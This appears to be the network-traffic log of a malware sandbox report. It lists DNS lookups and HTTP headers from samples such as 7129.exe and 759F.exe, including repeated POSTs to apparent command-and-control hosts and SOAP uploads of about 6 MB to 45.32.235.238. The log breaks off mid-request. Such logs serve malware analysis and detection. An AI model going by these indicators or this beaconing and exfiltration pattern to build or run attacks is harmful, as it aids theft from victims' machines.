                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 184
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 133
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 200
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 202
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          explorer.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 533
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:26 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://45.32.235.238:45555/
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          45.32.235.238:45555
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                          Host: 45.32.235.238:45555
                                                                                          Content-Length: 137
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 4525
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:01:32 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://45.32.235.238:45555/
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          45.32.235.238:45555
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                          Host: 45.32.235.238:45555
                                                                                          Content-Length: 6152946
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 150
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:01:41 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://45.32.235.238:45555/
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          45.32.235.238:45555
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                          Host: 45.32.235.238:45555
                                                                                          Content-Length: 6152932
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 261
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:01:41 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          api.ip.sb
                                                                                          26F0.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          api.ip.sb
                                                                                          IN A
                                                                                          Response
                                                                                          api.ip.sb
                                                                                          IN CNAME
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.26.13.31
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.26.12.31
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          IN A
                                                                                          172.67.75.172
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://api.ip.sb/geoip
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          104.26.13.31:443
                                                                                          Request
                                                                                          GET /geoip HTTP/1.1
                                                                                          Host: api.ip.sb
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:01:33 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 285
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Vary: Accept-Encoding
                                                                                          Cache-Control: no-cache
                                                                                          Access-Control-Allow-Origin: *
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=bLfxwrcYYlPeUAWgF37ziSWWSwqdjXGr42nYTTQs7MdNbZOoBfOZ0vPLi%2B%2BMyJEAncm6o6i5YEE8U9AbNYp%2BBJeqPV1sF1Ws%2BOxYU6nQjk3hPWRGObw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c52cc3bde6d45b-HAM
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          nusurtal4f.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          Response
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          5.61.43.76
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 303
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:00:55 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 164
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:00:55 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 161
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:00:55 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 230
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:10 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 8
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 188
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:10 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 192
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:10 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 47
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 328
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 331
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 72
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 243
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 249
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 57
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 318
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:13 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 66
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 313
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:16 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 311
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:16 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 44
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 214
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:17 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 158
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:17 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 224
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:17 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 60
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 364
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 180
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 109
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 299
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:21 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 307
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:22 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 257
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:22 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 45
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 143
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
